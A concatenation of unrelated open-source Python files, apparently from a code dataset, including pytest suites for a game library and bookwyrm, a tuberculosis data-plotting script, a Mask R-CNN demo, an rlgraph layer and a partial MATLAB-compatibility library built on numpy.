print('FIM')
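# Example run (not part of the original exercise): entering t1 = 1 and r = 2
# prints the first ten terms of the arithmetic progression:
# 1 3 5 7 9 11 13 15 17 19 FIM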
|
StarcoderdataPython
|
6642174
|
<gh_stars>0
import pytest
from ppb.errors import BadChildException
from ppb.gomlib import GameObject, Children
class TestEnemy:
pass
class TestPlayer:
pass
class TestSubclassPlayer(TestPlayer):
pass
class TestSprite:
pass
def containers():
yield GameObject()
def players():
yield TestPlayer()
yield TestSubclassPlayer()
def players_and_containers():
for player in players():
for container in containers():
yield player, container
@pytest.fixture()
def enemies():
return TestEnemy(), TestEnemy()
@pytest.mark.parametrize("player, container", players_and_containers())
def test_add_methods(container, player, enemies):
container.add(player)
for group, sprite in zip(("red", "blue"), enemies):
container.add(sprite, [group])
assert player in container
for enemy in enemies:
assert enemy in container
@pytest.mark.parametrize("container", containers())
def test_add_type_to_game_object(container):
with pytest.raises(BadChildException):
container.add(TestSprite)
@pytest.mark.parametrize("player, container", players_and_containers())
def test_get_methods(container, player, enemies):
sprite = TestSprite()
container.add(player, ["red"])
container.add(enemies[0])
container.add(enemies[1], ["red"])
container.add(sprite)
assert set(container.get(kind=TestEnemy)) == set(enemies)
assert set(container.get(kind=TestPlayer)) == {player}
assert set(container.get(kind=TestSprite)) == {sprite}
assert set(container.get(tag="red")) == {player, enemies[1]}
assert set(container.get(tag="this doesn't exist")) == set()
with pytest.raises(TypeError):
container.get()
@pytest.mark.parametrize("player, container", players_and_containers())
def test_get_with_string_tags(container, player):
"""Test that addings a string instead of an array-like throws."""
with pytest.raises(TypeError):
container.add(player, "player")
@pytest.mark.parametrize("player, container", players_and_containers())
def test_remove_methods(container, player, enemies):
container.add(player, ["test"])
container.add(enemies[0], ["test"])
container.add(enemies[1], ["blue"])
assert player in container
assert enemies[0] in container
assert enemies[1] in container
container.remove(player)
assert player not in container
for kind in container.kinds():
assert player not in container.get(kind=kind)
for tag in container.tags():
assert player not in container.get(tag=tag)
assert enemies[0] in container
assert enemies[0] in container.get(tag="test")
assert enemies[1] in container
@pytest.mark.parametrize("player", players())
def test_collection_methods(player, enemies):
container = Children()
container.add(player)
container.add(enemies[0])
# Test __len__
assert len(container) == 2
# Test __contains__
assert player in container
assert enemies[1] not in container
# Test __iter__
for game_object in container:
assert game_object is player or game_object is enemies[0]
|
StarcoderdataPython
|
191758
|
<reponame>eva-koester/tuberculosis
import pandas as pd
import cleaning
import matplotlib.pyplot as plt
import seaborn as sns
df = cleaning.load_clean_data()
df['age'] = df['age'].replace([1], 14)
#print(df)
# sum of value per age
age = df.groupby('age')['value'].sum()
age=pd.DataFrame(age)
age=age.reset_index()
print(age)
print(age.info())
# sum of value per gender and age
age_gen = df.groupby(['gender', 'age'])['value'].sum()
age_gen=pd.DataFrame(age_gen)
age_gen = age_gen.reset_index()
print(age_gen.info())
print(age_gen)
# sum of value per age and country
age_cou = df.groupby(['age', 'country'])['value'].sum()
age_cou=pd.DataFrame(age_cou, index=None)
age_cou = age_cou.reset_index()
age_cou=age_cou.sort_values('value', ascending=False)
print(age_cou)
print(age_cou.iloc[0:2, 1])
# IN and CN have max tb values (at some age level)
IN_CN = age_cou[(age_cou['country'] == 'IN') | (age_cou['country'] == 'CN')]
print(IN_CN)
# plot age and age_gen
ax = plt.subplot(3, 1, 1)
g=sns.lineplot(x='age', y='value', data=age, ax=ax)
g.set(xlabel='age', ylabel='tuberculosis')
plt.title('tb per age')
ax = plt.subplot(3, 1, 2)
f=sns.lineplot(x='age', y='value', hue='gender', data=age_gen, ax=ax)
plt.title('tb per age and gender')
f.set(xlabel='age', ylabel='tuberculosis')
plt.tight_layout()
ax = plt.subplot(3, 1, 3)
g=sns.lineplot(x='age', y='value', hue='country', data=IN_CN, ax=ax)
g.set(xlabel='age', ylabel='tuberculosis')
plt.title('tb per age of max tb countries')
plt.show()
|
StarcoderdataPython
|
3263540
|
<gh_stars>0
from unittest.mock import patch
from django.test import TestCase
from bookwyrm import models, incoming
class IncomingFollow(TestCase):
def setUp(self):
with patch('bookwyrm.models.user.set_remote_server.delay'):
with patch('bookwyrm.models.user.get_remote_reviews.delay'):
self.remote_user = models.User.objects.create_user(
'rat', '<EMAIL>', 'ratword',
local=False,
remote_id='https://example.com/users/rat',
inbox='https://example.com/users/rat/inbox',
outbox='https://example.com/users/rat/outbox',
)
self.local_user = models.User.objects.create_user(
'mouse', '<EMAIL>', 'mouseword', local=True)
self.local_user.remote_id = 'http://local.com/user/mouse'
self.local_user.save()
def test_handle_follow(self):
activity = {
"@context": "https://www.w3.org/ns/activitystreams",
"id": "https://example.com/users/rat/follows/123",
"type": "Follow",
"actor": "https://example.com/users/rat",
"object": "http://local.com/user/mouse"
}
with patch('bookwyrm.broadcast.broadcast_task.delay') as _:
incoming.handle_follow(activity)
# notification created
notification = models.Notification.objects.get()
self.assertEqual(notification.user, self.local_user)
self.assertEqual(notification.notification_type, 'FOLLOW')
# the request should have been deleted
requests = models.UserFollowRequest.objects.all()
self.assertEqual(list(requests), [])
# the follow relationship should exist
follow = models.UserFollows.objects.get(user_object=self.local_user)
self.assertEqual(follow.user_subject, self.remote_user)
def test_handle_follow_manually_approved(self):
activity = {
"@context": "https://www.w3.org/ns/activitystreams",
"id": "https://example.com/users/rat/follows/123",
"type": "Follow",
"actor": "https://example.com/users/rat",
"object": "http://local.com/user/mouse"
}
self.local_user.manually_approves_followers = True
self.local_user.save()
with patch('bookwyrm.broadcast.broadcast_task.delay') as _:
incoming.handle_follow(activity)
# notification created
notification = models.Notification.objects.get()
self.assertEqual(notification.user, self.local_user)
self.assertEqual(notification.notification_type, 'FOLLOW_REQUEST')
# the request should exist
request = models.UserFollowRequest.objects.get()
self.assertEqual(request.user_subject, self.remote_user)
self.assertEqual(request.user_object, self.local_user)
# the follow relationship should not exist
follow = models.UserFollows.objects.all()
self.assertEqual(list(follow), [])
|
StarcoderdataPython
|
3417435
|
from unittest import TestCase
from icon_microsoft_teams.connection import Connection
import json
import logging
class TestConnection(TestCase):
def test_connection(self):
log = logging.getLogger("Test")
test_conn = Connection()
test_conn.logger = log
with open("../tests/send_message.json") as file:
data = json.load(file)
connection_params = data.get("body").get("connection")
test_conn.connect(connection_params)
self.assertIsNotNone(test_conn.api_token)
|
StarcoderdataPython
|
331458
|
<gh_stars>1-10
# coding: utf-8
# # Mask R-CNN Demo
#
# A quick intro to using the pre-trained model to detect and segment objects.
# In[1]:
import os
import sys
import random
import math
import numpy as np
import skimage.io
import matplotlib
import matplotlib.pyplot as plt
# Root directory of the project
ROOT_DIR = os.path.abspath("../")
# Import Mask RCNN
sys.path.append(ROOT_DIR) # To find local version of the library
from mrcnn import utils
import mrcnn.model as modellib
from mrcnn import visualize
# Import COCO config
sys.path.append(os.path.join(ROOT_DIR, "samples/container/")) # To find local version
import container
#get_ipython().run_line_magic('matplotlib', 'inline')
# Directory to save logs and trained model
MODEL_DIR = os.path.join(ROOT_DIR, "logs")
# Local path to trained weights file
COCO_MODEL_PATH = os.path.join(ROOT_DIR, "logs/container20200717T1153/mask_rcnn_container_0030.h5")
# Download COCO trained weights from Releases if needed
if not os.path.exists(COCO_MODEL_PATH):
utils.download_trained_weights(COCO_MODEL_PATH)
# Directory of images to run detection on
IMAGE_DIR = os.path.join(ROOT_DIR, "samples/container/dataset/val")
# ## Configurations
#
# We'll be using a model trained on the MS-COCO dataset. The configurations of this model are in the ```CocoConfig``` class in ```coco.py```.
#
# For inferencing, modify the configurations a bit to fit the task. To do so, sub-class the ```CocoConfig``` class and override the attributes you need to change.
# In[2]:
class InferenceConfig(container.ContainerConfig):
# Set batch size to 1 since we'll be running inference on
# one image at a time. Batch size = GPU_COUNT * IMAGES_PER_GPU
GPU_COUNT = 1
IMAGES_PER_GPU = 1
config = InferenceConfig()
config.display()
# ## Create Model and Load Trained Weights
# In[3]:
# Create model object in inference mode.
model = modellib.MaskRCNN(mode="inference", model_dir=MODEL_DIR, config=config)
# Load weights trained on MS-COCO
model.load_weights(COCO_MODEL_PATH, by_name=True)
# ## Class Names
#
# The model classifies objects and returns class IDs, which are integer values that identify each class. Some datasets assign integer values to their classes and some don't. For example, in the MS-COCO dataset, the 'person' class is 1 and 'teddy bear' is 88. The IDs are often sequential, but not always. The COCO dataset, for example, has classes associated with class IDs 70 and 72, but not 71.
#
# To improve consistency, and to support training on data from multiple sources at the same time, our ```Dataset``` class assigns its own sequential integer IDs to each class. For example, if you load the COCO dataset using our ```Dataset``` class, the 'person' class would get class ID = 1 (just like COCO) and the 'teddy bear' class is 78 (different from COCO). Keep that in mind when mapping class IDs to class names.
#
# To get the list of class names, you'd load the dataset and then use the ```class_names``` property like this.
# ```
# # Load COCO dataset
# dataset = coco.CocoDataset()
# dataset.load_coco(COCO_DIR, "train")
# dataset.prepare()
#
# # Print class names
# print(dataset.class_names)
# ```
#
# We don't want to require you to download the COCO dataset just to run this demo, so we're including the list of class names below. The index of a class name in the list represents its ID (first class is 0, second is 1, third is 2, ...etc.)
# In[4]:
# COCO Class names
# Index of the class in the list is its ID. For example, to get ID of
# the teddy bear class, use: class_names.index('teddy bear')
class_names = ['BG','Cola Bottle','Fanta Bottle','Cherry Coke Bottle','Coke Zero Bottle','Mtn Dew Bottle','Cola Can','Fanta Can']
# ## Run Object Detection
# In[5]:
# Load a random image from the images folder
##file_names = next(os.walk(IMAGE_DIR))[2]
##image = skimage.io.imread(os.path.join(IMAGE_DIR, random.choice(file_names)))
test_image = skimage.io.imread(os.path.join(IMAGE_DIR,'Image0170.png'))
test_image = test_image[:,:,:3]
# Run detection
results = model.detect([test_image], verbose=1)
# Visualize results
r = results[0]
visualize.display_instances(test_image, r['rois'], r['masks'], r['class_ids'],
class_names, r['scores'])
# Evaluation
# Compute VOC-Style mAP @ IoU=0.5
# Running on 40 images. Increase for better accuracy.
from container import ContainerDataset
dataset_val = ContainerDataset()
dataset_val.load_container(os.path.join(ROOT_DIR, "samples/container/dataset"), "val")
dataset_val.prepare()
image_ids = np.random.choice(dataset_val.image_ids, 40)
APs = []
for image_id in image_ids:
# Load image and ground truth data
image, image_meta, gt_class_id, gt_bbox, gt_mask = modellib.load_image_gt(dataset_val, config, image_id, use_mini_mask=False)
image = image[:,:,:3]
# Run object detection
results = model.detect([image], verbose=0)
r = results[0]
# Compute AP
AP, precisions, recalls, overlaps = utils.compute_ap(gt_bbox, gt_class_id, gt_mask, r["rois"], r["class_ids"], r["scores"], r['masks'])
APs.append(AP)
print("mAP: ", np.mean(APs))
|
StarcoderdataPython
|
11226261
|
<reponame>samialabed/rlgraph
# Copyright 2018/2019 The RLgraph authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from rlgraph import get_backend
from rlgraph.components.layers.preprocessing import PreprocessLayer
from rlgraph.utils.decorators import rlgraph_api
if get_backend() == "tf":
import tensorflow as tf
class RankReinterpreter(PreprocessLayer):
"""
Re-interprets the given ranks (ints) into batch and/or time ranks.
"""
def __init__(self, batch_rank=None, time_rank=None, scope="rank-reinterpreter", **kwargs):
"""
Args:
batch_rank (Optional[int]): The rank to re-interpret as the batch rank.
time_rank (Optional[int]): The rank to re-interpret as the time rank.
"""
super(RankReinterpreter, self).__init__(space_agnostic=True, scope=scope, **kwargs)
self.batch_rank = batch_rank
self.time_rank = time_rank
@rlgraph_api
def _graph_fn_apply(self, preprocessing_inputs):
if get_backend() == "tf":
ret = tf.identity(preprocessing_inputs, name="rank-reinterpreted")
# We have to re-interpret the batch rank.
if self.batch_rank is not None:
ret._batch_rank = self.batch_rank
# We have to re-interpret the time rank.
if self.time_rank is not None:
ret._time_rank = self.time_rank
return ret
|
StarcoderdataPython
|
9719689
|
<filename>ompclib/ompclib_numpy.py
# This file is a part of OMPC (http://ompc.juricap.com/)
#
# for testing:
# import ompclib_numpy; reload(ompclib_numpy); from ompclib_numpy import *
# TODO
# - remove all references to array, use "ompc_base._init_data" instead
import sys, os; sys.path.append(os.path.abspath('..'))
from itertools import izip as _izip, cycle as _cycle, repeat as _repeat
from ompc import _get_narginout
import os, sys
import numpy as np
import pylab as mpl
# Functions that are to be exported have to be listed in the __ompc_all__
# array.
# This decorator adds a function to the "toolbox-less" OMPC base library.
__ompc_all__ = ['end', 'mslice', 'mstring', 'OMPCSEMI',
'OMPCException', 'elmul', 'elpow', 'eldiv', 'ldiv', 'elldiv']
def _ompc_base(func):
global __ompc_all__
__ompc_all__ += [ func.__name__ ]
return func
OMPCSEMI = Ellipsis
OMPCEND = None
end = OMPCEND
_dtype2numpy = {'complex': 'complex128',
'double': 'f8', 'single': 'f4',
'int32': 'i4', 'uint32': 'u4',
'int16': 'i2', 'uint16': 'u2',
'int8': 'i1', 'uint8': 'u1',
'char': 'u1',
'bool': 'bool',
}
_numpy2dtype = {}
for k, v in _dtype2numpy.items():
_numpy2dtype[np.dtype(v)] = k
_numpy2dtype[str(np.dtype(v))] = k
_numpy2dtype[v] = k
# errors and warnings
class OMPCException(Exception):
def __init__(self,msg):
self.msg = msg
def __str__(self):
return repr(self.msg)
@_ompc_base
def error(x):
raise OMPCException(x)
class mvar(object):
@staticmethod
def _DataObject(dtype, data):
return np.array(data, dtype=_dtype2numpy[dtype])
def __new__(cls, *args, **kwargs):
a = super(mvar, cls).__new__(cls, *args, **kwargs)
a._a = None
a.dtype = 'double'
a.msize = (0, 0)
return a
def _init_data(self, dtype, msize, data):
self.dtype = dtype
self.msize = msize
self._a = self._DataObject(dtype, data)
def __call__(self, *i):
mview = self.__getitem1__(i)
mview.__ompc_view__ = _mview(self, i, False)
return mview
def _ctypes_get(self):
return self._a.ctypes
ctypes = property(_ctypes_get, None, None,
"Ctypes-wrapped data object.")
def _lvalue_set(self, val):
assert hasattr(self, '__ompc_view__')
o = self.__ompc_view__
# FIXME: o.linear
o.viewed.__setitem1__(o.ins, val)
lvalue = property(None, _lvalue_set, None, "")
def __copy__(self):
return _marray(self.dtype, self.msize, self._a.copy())
def __deepcopy__(self):
return _marray(self.dtype, self.msize, self._a.copy())
def __base0__(self, shp=None):
raise OMPCException(
'Class "%s" cannot be used as index!'%self.__class__)
# FIXME: warn people about using numpy functions directly
def __array__(self):
print 'in __array__', repr(self)
print 'in __array__', self
raise NotImplementedError("At the moment using numpy functions " \
"directly is not possible! Please read the documentation at " \
"http://ompc.juricap.com/documentation/.")
def __nonzero__(self):
return bool(np.any(self._a != 0))
class _mview(mvar):
def __init__(self, viewed, ins, linear):
self.viewed = viewed
self.ins = ins
self.linear = linear
def __repr__(self):
return "_mview(%r, %r, %r)"%(self.viewed, self.ins, self.linear)
def __str__(self):
return "<view of %r>"%(self.viewed)
def _dsize(dtype):
return _dsize_dict[dtype]
def _flatten(seq):
for item in seq:
if _isscalar(item) and not hasattr(item, '__len__'):
yield item
else:
for subitem in _flatten(item):
yield subitem
def _ndi(*i):
"""Returns a generator of tuples that iterate over elements specified
by slices and indices in `i`."""
from itertools import chain, repeat, cycle, izip
r = lambda x: range(x.start, x.stop, x.step is None and 1 or x.step)
res = []
for x in i:
if isinstance(x, slice): res.append(r(x))
elif _isscalar(x): res.append([x])
else: res.append(x)
i = res
cp = 1
gs = []
for x in i[:-1]:
gs += [ cycle(chain(*(repeat(j,cp) for j in x))) ]
cp *= len(x)
gs += [ chain(*(repeat(j,cp) for j in i[-1])) ]
return izip(*gs)
def _isscalar(A):
if isinstance(A, str):
return False
elif hasattr(A, '__len__') and len(A) > 1:
return False
elif hasattr(A, '__getitem__'):
try: A[1]
except: return True
else: return False
elif hasattr(A, '__iter__'):
return False
# doesn't have length nor multiple elements and doesn't support iteration
return True
def _typegreater_(Adt, Bdt):
"""Returns type with higher precision."""
if isinstance(Adt, _marray): Adt = Adt.dtype
if isinstance(Bdt, _marray): Bdt = Bdt.dtype
return _dsize_dict[Adt] >= _dsize_dict[Bdt] and Adt or Bdt
def _typegreater(Adt, Bdt):
"""Returns type with higher precision."""
return _dsize_dict[Adt] >= _dsize_dict[Bdt] and Adt or Bdt
def _dtype(X):
# from operator import isSequenceType
# while isSequenceType(X):
# X = X[0]
# res = tuple(reversed(shp))
# FIXME: return
if isinstance(X, str):
return 'char'
return 'double'
def _size(X, d=None):
if isinstance(X, _marray):
res = X.msize
elif _isscalar(X):
return (1, 1)
else:
from operator import isSequenceType
shp = []
while isSequenceType(X):
shp.append(len(X))
X = X[0]
res = tuple(reversed(shp))
# minimum shape is 2 dimensional
if len(res) == 1:
res = (1, res[0])
if d is None:
return res
else:
return res[d]
def _ndshape(msize, *i):
"""Determine the shape of a view on A with slicing specified in `i`.
"""
shp = []
for idim, x in enumerate(i):
if isinstance(x, slice):
start, stop, step = x.start, x.stop, x.step
if x.start is None: start = 0
if x.stop == sys.maxint or x.stop is None: stop = msize[idim]
if x.step is None: step = 1
shp.append( len(range(start,stop,step)) )
elif _isscalar(x):
shp.append(1)
elif hasattr(x, '__len__'):
shp.append(len(x))
else:
raise NotImplementedError()
if len(shp) == 1: shp[:0] = [1]
return shp
def _ndshape1(msize, *i):
"""Determine shape of a view on size msize with slicing specified in `i`.
"""
shp = []
for idim, x in enumerate(i):
if isinstance(x, _mslice):
if x.hasnoend():
shp.append( len(mslice[x.start:x.step:msize[idim]]) )
else:
shp.append( len(x) )
elif _isscalar(x):
shp.append(1)
elif hasattr(x, '__len__'):
shp.append(len(x))
else:
if isinstance(x, slice):
raise NotImplementedError()
shp.append(mrange(x))
else:
raise NotImplementedError()
#if len(shp) == 1: shp[:0] = [1]
if len(shp) == 1:
if msize[0] == 1: shp[:0] = [1]
else: shp.append(1)
return shp
@_ompc_base
def isempty(A):
return np.prod(A.msize) == 0
###################### base mfunctions
@_ompc_base
def plus(A, B):
if isinstance(A, mvar): A = A._a
if isinstance(B, mvar): B = B._a
na = A+B
return _marray(_numpy2dtype[na.dtype], na.shape[::-1], na)
@_ompc_base
def minus(A, B):
if isinstance(A, mvar): A = A._a
if isinstance(B, mvar): B = B._a
na = A-B
return _marray(_numpy2dtype[na.dtype], na.shape[::-1], na)
@_ompc_base
def uminus(A):
if isinstance(A, mvar): A = A._a
na = -A
return _marray(_numpy2dtype[na.dtype], na.shape[::-1], na)
@_ompc_base
def times(A, B):
if isinstance(A, mvar): A = A._a
if isinstance(B, mvar): B = B._a
na = A*B
return _marray(_numpy2dtype[na.dtype], na.shape[::-1], na)
@_ompc_base
def mtimes(A, B):
if isinstance(A, mvar): A = A._a
if isinstance(B, mvar): B = B._a
# the arrays are stored transposed
na = np.dot(B, A)
return _marray(_numpy2dtype[na.dtype], na.shape[::-1], na)
@_ompc_base
def power(A, B):
if isinstance(A, mvar): A = A._a
if isinstance(B, mvar): B = B._a
na = A**B
return _marray(_numpy2dtype[na.dtype], na.shape[::-1], na)
try:
from numpy.linalg import matrix_power
except:
def matrix_power(M,n):
if len(M.shape) != 2 or M.shape[0] != M.shape[1]:
raise ValueError("input must be a square array")
if not np.issubdtype(type(n), int):
raise TypeError("exponent must be an integer")
from numpy.linalg import inv
if n==0:
M = M.copy()
M[:] = np.identity(M.shape[0])
return M
elif n<0:
M = inv(M)
n *= -1
result = M
if n <= 3:
for _ in range(n-1):
result = np.dot(result, M)
return result
# binary decomposition to reduce the number of Matrix
# multiplications for n > 3.
beta = np.binary_repr(n)
Z, q, t = M, 0, len(beta)
while beta[t-q-1] == '0':
Z = np.dot(Z,Z)
q += 1
result = Z
for k in range(q+1,t):
Z = np.dot(Z,Z)
if beta[t-k-1] == '1':
result = np.dot(result,Z)
return result
@_ompc_base
def mpower(A, B):
if len(A.msize) != 2:
raise OMPCException('??? Error using ==> mpower\n'
'marray must be 2-D')
if isinstance(A, mvar): A = A._a
if isinstance(B, mvar): B = B._a
if isinstance(B, float):
if np.around(B) != B: raise NotImplementedError()
else: B = int(B)
na = matrix_power(A.T, B)
return _marray(_numpy2dtype[na.dtype], na.shape[::-1], na)
_solve = np.linalg.solve
@_ompc_base
def mldivide(A, B):
# FIXME A, B have to be matrices
if A.msize[0] == A.msize[1]:
if isinstance(A, mvar): A = A._a
if isinstance(B, mvar): B = B._a
na = _solve(A, B)
msize = na.shape[::-1]
if len(msize) == 1: msize = (msize[0], 1)
return _marray(_numpy2dtype[na.dtype], msize, na.T)
else:
raise NotImplementedError()
raise NotImplementedError()
@_ompc_base
def mrdivide(A, B):
"A/B = (B.T\A.T).T"
return mldivide(B.T, A.T).T
# raise NotImplementedError()
@_ompc_base
def ldivide(A, B):
return rdivide(B, A)
@_ompc_base
def rdivide(A, B):
if isinstance(A, mvar): A = A._a
if isinstance(B, mvar): B = B._a
na = A / B
return _marray(_numpy2dtype[na.dtype], na.shape[::-1], na)
@_ompc_base
def eq(A, B):
if isinstance(A, mvar): A = A._a
if isinstance(B, mvar): B = B._a
na = A == B
return _marray('bool', na.shape[::-1], na)
@_ompc_base
def ne(A, B):
if isinstance(A, mvar): A = A._a
if isinstance(B, mvar): B = B._a
na = A != B
return _marray('bool', na.shape[::-1], na)
@_ompc_base
def lt(A, B):
if isinstance(A, mvar): A = A._a
if isinstance(B, mvar): B = B._a
na = A < B
return _marray('bool', na.shape[::-1], na)
@_ompc_base
def gt(A, B):
if isinstance(A, mvar): A = A._a
if isinstance(B, mvar): B = B._a
na = A > B
return _marray('bool', na.shape[::-1], na)
@_ompc_base
def le(A, B):
if isinstance(A, mvar): A = A._a
if isinstance(B, mvar): B = B._a
na = A <= B
return _marray('bool', na.shape[::-1], na)
@_ompc_base
def ge(A, B):
if isinstance(A, mvar): A = A._a
if isinstance(B, mvar): B = B._a
na = A >= B
return _marray('bool', na.shape[::-1], na)
@_ompc_base
def and_(A, B):
'''Element-wise logical AND.'''
if isinstance(A, mvar): A = A._a
if isinstance(B, mvar): B = B._a
na = np.logical_and(A, B)
return _marray('bool', na.shape[::-1], na)
@_ompc_base
def or_(A, B):
'''Element-wise logical OR.'''
if isinstance(A, mvar): A = A._a
if isinstance(B, mvar): B = B._a
na = np.logical_or(A, B)
return _marray('bool', na.shape[::-1], na)
@_ompc_base
def not_(A):
'''Logical NOT.'''
if isinstance(A, mvar): A = A._a
na = np.logical_not(A)
return _marray('bool', na.shape[::-1], na)
@_ompc_base
def xor_(A, B):
'''Logical XOR.'''
if isinstance(A, mvar): A = A._a
if isinstance(B, mvar): B = B._a
na = np.logical_xor(A, B)
return _marray('bool', na.shape[::-1], na)
@_ompc_base
def any(A):
'''True if any element of vector is nonzero'''
if isinstance(A, mvar): A = A._a
return bool(np.any(A))
@_ompc_base
def all(A):
'''True if all elements of vector is nonzero'''
if isinstance(A, mvar): A = A._a
return bool(np.all(A))
def transpose(A):
'''Transpose.'''
if len(A.msize) != 2:
raise OMPCException('Transpose on ND array is not defined.')
return _marray(A.dtype, A.msize[::-1], A._a.T.copy())
def ctranspose(A):
'''Complex conjugate transpose.'''
if len(A.msize) != 2:
raise OMPCException('Transpose on ND array is not defined.')
return _marray(A.dtype, A.msize[::-1], A._a.conj().T.copy())
def horzcat(*X):
'''Horizontal concatenation.'''
# our _a member is transposed do vertcat
X = [ isinstance(x, mvar) and x or x._a for x in X ]
na = np.vstack(X)
return _marray(_numpy2dtype[na.dtype], na.shape[::-1], na)
def vertcat(*X):
'''Vertical concatenation.'''
# our _a member is transposed do horztcat
X = [ isinstance(x, mvar) and x or x._a for x in X ]
na = np.hstack(X)
return _marray(_numpy2dtype[na.dtype], na.shape[::-1], na)
# FIXME bit operations
def union(A, B, flag=None):
'''Set union.'''
# FIXME support nargout = 3
if isinstance(A, mvar): A = A._a
if isinstance(B, mvar): B = B._a
if flag is not None and flag.lower() == 'rows':
if A.ndim != 2 or B.ndim != 2:
raise OMPCException('A nd B must 2D matrices!')
if A.shape[0] != B.shape[0]:
raise OMPCException('A nd B must have same number of columns!')
# FIXME: slow and memory hungry
sA = set( tuple(x) for x in A )
na = np.array([ x for x in sA.union( tuple(x) for x in B ) ]).T
else:
# must be vectors
if A.shape[0] == 1 or A.shape[1] == 1: A = A.reshape(-1)
else: raise OMPCException('A nd B must vectors or 2D matrices!')
if B.shape[0] == 1 or B.shape[1] == 1: B = B.reshape(-1)
else: raise OMPCException('A nd B must vectors or 2D matrices!')
na = np.union1d(A, B).reshape(-1,1)
return _marray(_numpy2dtype[na.dtype], na.shape[::-1], na)
def unique(A, B):
'''Set unique.'''
raise NotImplementedError()
def intersect(A, B):
'''Set intersection.'''
raise NotImplementedError()
def setdiff(A, B):
'''Set difference.'''
raise NotImplementedError()
def setxor(A, B):
'''Set exclusive-or.'''
raise NotImplementedError()
def ismember(A, B):
'''True for set member.'''
raise NotImplementedError()
############ operators
class _el(object):
def __new__(cls, left=None, right=None):
if left is None or right is None:
nel = super(_el, cls).__new__(_el)
nel.__class__ = cls
nel.left = left
nel.right = right
return nel
else:
return cls.op(left, right)
def make_operator(name, method):
class _op(_el):
op = staticmethod(method)
def op(self, right):
if self.left is None: return self.__class__(right=right)
return self.op(self.left, right)
def rop(self, left):
if self.right is None: return self.__class__(left=left)
return self.op(left, self.right)
_op.__name__ = '_el%s'%name
setattr(_op, '__%s__'%name, op)
setattr(_op, '__r%s__'%name, rop)
return _op()
elmul = make_operator('mul', times)
elpow = make_operator('pow', power)
eldiv = make_operator('div', rdivide)
ldiv = make_operator('div', mldivide)
elldiv = make_operator('div', ldivide)
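# A minimal usage note (not part of the original file): the _el wrappers above give
# MATLAB-style element-wise operators through an infix idiom, e.g. (assuming A and B
# are _marray instances of compatible size):
#     C = A *elmul* B     # element-wise multiply, i.e. times(A, B)
#     D = A /eldiv/ B     # element-wise divide, i.e. rdivide(A, B)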
############ support functions
def _squeeze(A):
res = A.__copy__()
res.msize = [ x for x in res.msize if x > 1 ]
return res
def _msize(*args):
if len(args) == 1 and hasattr(args, '__len__'):
args = args[0]
if len(args) > 2 and args[-1] == 1: args = args[:-1]
if len(args) == 1:
if construct: args = (args[0], args[0])
else: args = (args[0], 1)
return args
import __builtin__
def doublestr(x,prec=4):
try:
float(x)
except:
return x
else:
return '%6s'%__builtin__.round(x,4)
import __builtin__
def complexstr(x,prec=4):
try:
x = complex(x)
except:
return x
else:
return '%6s %s %6sj'%(__builtin__.round(x.real,4),
x.imag >= 0.0 and '+' or '-',
__builtin__.round(x.imag,4))
def print_marray(A, ans=True):
nstr = doublestr
if A.dtype == 'complex': nstr = complexstr
pre = ''
if ans:
pre = '\nans = \n'
if isempty(A):
pre += '\n []'
if len(A.msize) > 2:
for i in _ndi(*[slice(0,x) for x in A.msize[2:]]):
pre += '\n(:, :, %s)\n'%', '.join([str(x+1) for x in i])
cur = (slice(0,A.msize[0]), slice(0, A.msize[1])) + i
sA = A.__getitem__(cur)
sA.msize = A.msize[:2]
pre += print_marray(sA, False)
return pre
else:
#return str(A._a.T) + '\n\n'
M, N = A.msize
if N < 10: srow = lambda i: A._a[:,i]
else: srow = lambda i: list(A._a[[0, 1, 2],i]) + \
['...'] + \
list(A._a[[N-3, N-2, N-1], i])
if M < 10: rows = ( srow(i) for i in xrange(M) )
else: rows = [ srow(i) for i in xrange(3) ] + \
[('...',)] + \
[ srow(i) for i in [M-3,M-2,M-1] ]
res = pre + '\n ' + \
'\n '.join(', '.join(map(nstr,x)) for x in rows)
if ans: res += '\n\n'
else: res += '\n'
return res
@_ompc_base
def disp(X):
if isinstance(X, _marray):
print print_marray(X, False)
    elif isinstance(X, str):
print X
else:
print X
class _marray(mvar):
@staticmethod
def empty(shp, dtype):
return _marray(dtype, shp)
@staticmethod
def zeros(shp, dtype):
na = _marray(dtype, shp)
na._a.flat[:] = 0 #np.zeros(na.msize[::-1], _dtype2numpy[dtype])
#na.msize = shp
return na
@staticmethod
def ones(shp, dtype):
na = _marray(dtype, shp)
na._a.flat[:] = 1 #np.ones(na.msize[::-1], _dtype2numpy[dtype])
#na.msize = shp
return na
def __init__(self, dtype, msize, a=None):
from operator import isSequenceType
if not isSequenceType(msize):
msize = (msize, msize)
elif len(msize) == 1:
msize = (msize[0], 1)
if a is None:
self._a = np.empty(msize[::-1], _dtype2numpy[dtype])
elif isinstance(a, np.ndarray):
self._a = a
else:
self._a = np.array(a, _dtype2numpy[dtype]).reshape(msize[::-1])
self.msize = msize
self.dtype = dtype
def __copy__(self):
return _marray(self.dtype, self.msize, self._a.copy())
def __deepcopy__(self):
return _marray(self.dtype, self.msize, self._a.copy())
# operators
def __elpow__(self, him):
return power(self, him)
def __pow__(self, right):
# if multiplying with _el object, call the elementwise operation
if isinstance(right, _el): return right.__class__(self, right.right)
elif _isscalar(right): return power(self, right)
return mpower(self, right)
def __rpow__(self, left):
# if multiplying with _el object, call the elementwise operation
if isinstance(left, _el): return left.__class__(left.left, self)
elif _isscalar(left): return power(left, self)
return mpower(left, self)
def __elmul__(self, him):
return times(self, him)
def __mul__(self, right):
if isinstance(right, _el): return right.__class__(self, right.right)
elif _isscalar(right): return times(self, right)
return mtimes(self, right)
def __rmul__(self, left):
if isinstance(left, _el): return left.__class__(left.left, self)
elif _isscalar(left): return times(left, self)
return mtimes(left, self)
def __eldiv__(self, him):
return rdivide(self, him)
def __div__(self, right):
# if multiplying with _el object, call the elementwise operation
        if isinstance(right, _el): return right.__class__(self, right.right)
elif _isscalar(right): return rdivide(self, right)
return mrdivide(self, right)
def __rdiv__(self, left):
# if multiplying with _el object, call the elementwise operation
if isinstance(left, _el): return left.__class__(left.left, self)
elif _isscalar(left): return rdivide(left, self)
